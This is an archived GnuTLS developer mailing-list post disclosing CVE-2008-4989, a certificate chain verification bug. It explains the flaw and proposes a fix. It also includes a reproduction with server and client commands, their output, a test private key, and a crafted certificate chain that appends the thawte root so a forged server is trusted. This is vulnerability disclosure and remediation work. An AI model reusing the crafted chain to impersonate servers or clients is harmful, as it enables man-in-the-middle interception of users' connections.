Analysis of vulnerability GNUTLS-SA-2008-3 CVE-2008-4989
Martin von Gagern
Martin.vGagern at gmx.net
Mon Nov 10 12:00:10 CET 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello GNU TLS developers, and other interested parties,
This is an analysis fo the GNU TLS vulnerability recently published as
GNUTLS-SA-2008-3 and CVE-2008-4989.
I found a bug in GNU TLS which breaks X.509 certificate chain
verification. This allows a man in the middle to assume any name and
trick GNU TLS clients into trusting that name.
This could be used to imitate a server using a specially crafted server
certificate chain together with DNS spoofing or some way of intercepting
packets along their route. It could also be used to imitate clients
authenticating to some service using client certificates, again using
specially crafted certificate chains.
CAUSE OF THE VULNERABILITY
The bug is in function _gnutls_x509_verify_certificate in x509/verify.c.
1. The last element of the certificate list is verified against the list
of trusted certificates.
2. The last element is removed from the list if it is self signed.
3. The chain is checked to ensure that every certificate is signed by
the one following it, with the exception of the last element.
By appending an arbitrary self-signed trusted certificate to the list,
the penultimate element is implicitely trusted, without being checked
against the list of trusted certificates.
As a solution to fix the issue, I suggest dropping self signed certs
before validating any certificate against the list of trusted
certificates. The attached patch should apply to older versions of GNU
TLS as well, so distributions can use it to fix their released versions.
An alternative might be to not drop self-signed certificates at all, as
it doesn't seem necessary. This should be discussed by the developers.
STEPS TO REPRODUCE IN A MODEL SETUP
To reproduce, add "server" as an alias for localhost to your /etc/hosts.
Run the following command, using the files attached:
$ gnutls-serv --http -p 4433 -a \
--x509keyfile server.key --x509certfile chain.pem
Then connect to this server using the GNU TLS client:
$ gnutls-cli gnutls-cli --x509cafile thawte.pem -p 4433 server
- Certificate[0] info:
# The hostname in the certificate matches 'server'.
# valid since: Mon Nov 3 13:05:04 CET 2008
# expires at: Wed Dec 3 13:05:04 CET 2008
# fingerprint: 2A:8E:2F:D6:73:A8:74:F7:D7:AE:E9:FC:C5:31:3D:00
# Subject's DN: C=DE,O=GNU TLS Attack,CN=server
# Issuer's DN: C=DE,O=GNU TLS Attack,CN=intermediate
- Certificate[1] info:
# valid since: Mon Nov 3 13:04:45 CET 2008
# expires at: Wed Dec 3 13:04:45 CET 2008
# fingerprint: 3C:45:D6:7E:04:ED:BD:77:F1:AA:F8:17:D4:2E:14:E5
# Subject's DN: C=DE,O=GNU TLS Attack,CN=intermediate
# Issuer's DN: C=DE,O=GNU TLS Attack,CN=root
- Certificate[2] info:
# valid since: Fri Nov 17 01:00:00 CET 2006
# expires at: Thu Jul 17 01:59:59 CEST 2036
# fingerprint: 8C:CA:DC:0B:22:CE:F5:BE:72:AC:41:1A:11:A8:D8:12
# Subject's DN: C=US,O=thawte\, Inc.,
OU=Certification Services Division,
OU=(c) 2006 thawte\, Inc. - For authorized use only,
CN=thawte Primary Root CA
# Issuer's DN: C=US,O=thawte\, Inc.,
OU=Certification Services Division,
OU=(c) 2006 thawte\, Inc. - For authorized use only,
CN=thawte Primary Root CA
- - Peer's certificate is trusted
- - Version: TLS1.1
- - Key Exchange: DHE-RSA
- - Cipher: AES-128-CBC
- - MAC: SHA1
- - Compression: NULL
- - Handshake was completed
As you can see, there is no relation at all between Certificate[1] and
Certificate[2]. By attaching the thawte root certificate, which is
commonly trusted, I could get my own server authenticated as "server",
without ever transmitting the bogus root of its chain.
I used the http mode of gnutls-serv above so you can check browsers and
other http-based tools against this server as well, to see if they are
vulnerable.
Greetings,
Martin von Gagern
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkkYFDkACgkQRhp6o4m9dFvvGwCePvDi+wALLEjthVH1LXgCZqUk
3yIAoIsEar/BIVagS5ZA6r9kFtb5zsow
=sMlK
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: GNUTLS-SA-2008-3.patch
URL: </pipermail/attachments/20081110/3d2b7a27/attachment.asc>
-------------- next part --------------
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQDKdL9g5ErMLOLRCjiomZlNLhy0moWGaKIWaX6vyUIfh8d6FcAr
HoKoqhmX7ckvod50sOYPojQesDpl7gVaQNA6Ntr1VCcuNPefUKWtEwL0Qu9JbPnU
oIYd7mAaqVQgFp6W6yzV/dp63LH4XSdzBMhpZ/EU6vZoE8SvVLdqj5r6jwIDAQAB
AoGBAKX50Gu+vRNmOQznNEwEoImFpELr60ulvDxjgFjcxjjTN9X+vuyatsNPsGu9
pZJHQfiojfODJveBwl6OJBU5zXp1WBrFretdyl5wvTt9Gv31oxCPkcBTgefEpFtk
CWQcMB9AsHEDMayCxP+EexODXVfaSx+a9uRBroiT5q837RgBAkEA+d2yQtJhWgm2
KPNCrVvlb5GVISeLnvB7mCaZtrPvs010ib2xnR/vLCqL1qWUJL2C/90TXCek6yG2
RwgyyOUzYQJBAM9tGXQXbOUKl+k0Q2QsV3m1MYoE1H4krNN/o/nr7bsyW1Mt88xc
ZVJe2wWxyO06MGUqwOF+G8e6QI0T/J+x4+8CQFg2RXXD0iy4WwAQCY0scU63JeAD
lw4wtmGb1w6ibdBuWuM5/heLq6N7Dc1kvW1PHo14HhqdwGJmj3R6V3uHN2ECQFdb
mlmzN/BqeroDgdJhfmHKttdq21dY+NSGMDgkbdXmCmJIuyG5VA7R1ipaysVmOVWS
IPOW2fpO7bq8zSswj08CQC+GqKa1CrzRJGFGIUOROuOfgAfOu8ugSMhpS8lQoY3B
vYM6VtVdQjTE5je34tx6pTbbbA9h18YQVONekImYBvY=
-----END RSA PRIVATE KEY-----
-------------- next part --------------
-----BEGIN CERTIFICATE-----
MIIB6zCCAVQCCQCgwnB/k0WZrDANBgkqhkiG9w0BAQUFADA9MQswCQYDVQQGEwJE
RTEXMBUGA1UEChMOR05VIFRMUyBBdHRhY2sxFTATBgNVBAMTDGludGVybWVkaWF0
ZTAeFw0wODExMDMxMjA1MDRaFw0wODEyMDMxMjA1MDRaMDcxCzAJBgNVBAYTAkRF
MRcwFQYDVQQKEw5HTlUgVExTIEF0dGFjazEPMA0GA1UEAxMGc2VydmVyMIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQDKdL9g5ErMLOLRCjiomZlNLhy0moWGaKIW
aX6vyUIfh8d6FcArHoKoqhmX7ckvod50sOYPojQesDpl7gVaQNA6Ntr1VCcuNPef
UKWtEwL0Qu9JbPnUoIYd7mAaqVQgFp6W6yzV/dp63LH4XSdzBMhpZ/EU6vZoE8Sv
VLdqj5r6jwIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAH4QRR7sZEbjW00tXYk/3O/Z
96AxJNg0F78W5B68gaJrLJ7DTE2RTglscuEq1+2Jyb4AIziwXpYqxgwcP91QpH97
XfwdXIcyjYvVLHiKmkQj2zJTY7MeyiEQQ2it8VstZG2fYmi2EiMZIEnyJ2JJ7bA7
bF7pG7Cg3oEHUM0H5KUU
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICADCCAWmgAwIBAgIJAIZ4nkHQAqTFMA0GCSqGSIb3DQEBBQUAMDUxCzAJBgNV
BAYTAkRFMRcwFQYDVQQKEw5HTlUgVExTIEF0dGFjazENMAsGA1UEAxMEcm9vdDAe
Fw0wODExMDMxMjA0NDVaFw0wODEyMDMxMjA0NDVaMD0xCzAJBgNVBAYTAkRFMRcw
FQYDVQQKEw5HTlUgVExTIEF0dGFjazEVMBMGA1UEAxMMaW50ZXJtZWRpYXRlMIGf
MA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDvBpW8sAhIuUmNvcBE6wv/q7MtM1Z9
2I1SDL8eJ8I2nPg6BlCX+OIqNruynj8J7uPEQ04ZLwLxNXoyZa8057YFyrKLOvoj
5IfBtidsLWYv6PO3qqHJXVvwGdS7PKMuUlsjucCRyXVgQ07ODF7piqoVFi9KD99w
AU5+9plGrZNP/wIDAQABoxAwDjAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUA
A4GBAGPg+M+8MsB6zHN2o+jAtyqovrTTwmzVWEgfEH/aHC9+imGZRQ5lFNc2vdny
AgaJ9/izO5S6Ibb5zUowN2WhoUJOVipuQa2m9AviOgheoU7tmANC9ylm/pRkKy/0
n5UVzlKxDhRp/xBb7MWOw3KEQjiAf2Z3wCLcCPUqcJUdJC4v
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEIDCCAwigAwIBAgIQNE7VVyDV7exJ9C/ON9srbTANBgkqhkiG9w0BAQUF
ADCBqTELMAkGA1UEBhMCVVMxFTATBgNVBAoTDHRoYXd0ZSwgSW5jLjEoMCYG
A1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjE4MDYGA1UE
CxMvKGMpIDIwMDYgdGhhd3RlLCBJbmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNl
IG9ubHkxHzAdBgNVBAMTFnRoYXd0ZSBQcmltYXJ5IFJvb3QgQ0EwHhcNMDYx
MTE3MDAwMDAwWhcNMzYwNzE2MjM1OTU5WjCBqTELMAkGA1UEBhMCVVMxFTAT
BgNVBAoTDHRoYXd0ZSwgSW5jLjEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBT
ZXJ2aWNlcyBEaXZpc2lvbjE4MDYGA1UECxMvKGMpIDIwMDYgdGhhd3RlLCBJ
bmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxHzAdBgNVBAMTFnRoYXd0
ZSBQcmltYXJ5IFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQCsoPD7gFnUnMekz52hWXMJEEUMDSxuaPFsW0hoSVk3/AszGcJ3f8wQ
LZU0HObrTQmnHNK4yZc2AreJ1CRfBsDMRJSUjQJib+ta3RGNKJpchJAQeg29
dGYvajig4tVUROsdB58Hum/u6f1OCyn1PoSgAfGcq/gcfomk6KHYcWUNo1F7
7rzSImANuVud37r8UVsLr5iy6S7pBOhih94ryNdOwUxkHt3Ph1i6Sk/KaAcd
HJ1KxtUvkcx8cXIcxcBn6zL9yZJclNqFwJu/U30rCfSMnZEfl2pSy94JNqR3
2HuHUETVPm4pafs5SSYeCaWAe0At6+gnhcn+Yf1+5nyXHdWdAgMBAAGjQjBA
MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBR7
W0XPr87Lev0xkhpqtvNG61dIUDANBgkqhkiG9w0BAQUFAAOCAQEAeRHAS7OR
tvzw6WfUDW5FvlXok9LOAz/t2iWwHVfLHjp2oEzsUHboZHIMpKnxuIvW1oeE
uzLlQRHAd9mzYJ3rG9XRbkREqaYB7FViHXe4XI5ISXycO1cRrK1zN44veFyQ
aEfZYGDm/Ac9IiAXxPcW6cTYcvnIc3zfFi8VqT79aie2oetaupgf1eNNZAqd
E8hhuvU5HIe6uL17In/2/qxAeeWsEG89jxt5dovEN7MhGITlNgDrYyCZuen+
MwS7QcjBAvlEYyCegc5C09Y/LHbTY5xZ3Y+m4Q6gLkH3LpVHz7z9M/P2C2F+
fpErgUfCJzDupxBdN49cOSvkBPB7jVaMaA==
-----END CERTIFICATE-----
-------------- next part --------------
-----BEGIN CERTIFICATE-----
MIIEIDCCAwigAwIBAgIQNE7VVyDV7exJ9C/ON9srbTANBgkqhkiG9w0BAQUF
ADCBqTELMAkGA1UEBhMCVVMxFTATBgNVBAoTDHRoYXd0ZSwgSW5jLjEoMCYG
A1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjE4MDYGA1UE
CxMvKGMpIDIwMDYgdGhhd3RlLCBJbmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNl
IG9ubHkxHzAdBgNVBAMTFnRoYXd0ZSBQcmltYXJ5IFJvb3QgQ0EwHhcNMDYx
MTE3MDAwMDAwWhcNMzYwNzE2MjM1OTU5WjCBqTELMAkGA1UEBhMCVVMxFTAT
BgNVBAoTDHRoYXd0ZSwgSW5jLjEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBT
ZXJ2aWNlcyBEaXZpc2lvbjE4MDYGA1UECxMvKGMpIDIwMDYgdGhhd3RlLCBJ
bmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxHzAdBgNVBAMTFnRoYXd0
ZSBQcmltYXJ5IFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQCsoPD7gFnUnMekz52hWXMJEEUMDSxuaPFsW0hoSVk3/AszGcJ3f8wQ
LZU0HObrTQmnHNK4yZc2AreJ1CRfBsDMRJSUjQJib+ta3RGNKJpchJAQeg29
dGYvajig4tVUROsdB58Hum/u6f1OCyn1PoSgAfGcq/gcfomk6KHYcWUNo1F7
7rzSImANuVud37r8UVsLr5iy6S7pBOhih94ryNdOwUxkHt3Ph1i6Sk/KaAcd
HJ1KxtUvkcx8cXIcxcBn6zL9yZJclNqFwJu/U30rCfSMnZEfl2pSy94JNqR3
2HuHUETVPm4pafs5SSYeCaWAe0At6+gnhcn+Yf1+5nyXHdWdAgMBAAGjQjBA
MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBR7
W0XPr87Lev0xkhpqtvNG61dIUDANBgkqhkiG9w0BAQUFAAOCAQEAeRHAS7OR
tvzw6WfUDW5FvlXok9LOAz/t2iWwHVfLHjp2oEzsUHboZHIMpKnxuIvW1oeE
uzLlQRHAd9mzYJ3rG9XRbkREqaYB7FViHXe4XI5ISXycO1cRrK1zN44veFyQ
aEfZYGDm/Ac9IiAXxPcW6cTYcvnIc3zfFi8VqT79aie2oetaupgf1eNNZAqd
E8hhuvU5HIe6uL17In/2/qxAeeWsEG89jxt5dovEN7MhGITlNgDrYyCZuen+
MwS7QcjBAvlEYyCegc5C09Y/LHbTY5xZ3Y+m4Q6gLkH3LpVHz7z9M/P2C2F+
fpErgUfCJzDupxBdN49cOSvkBPB7jVaMaA==
-----END CERTIFICATE-----
More information about the Gnutls-devel
mailing list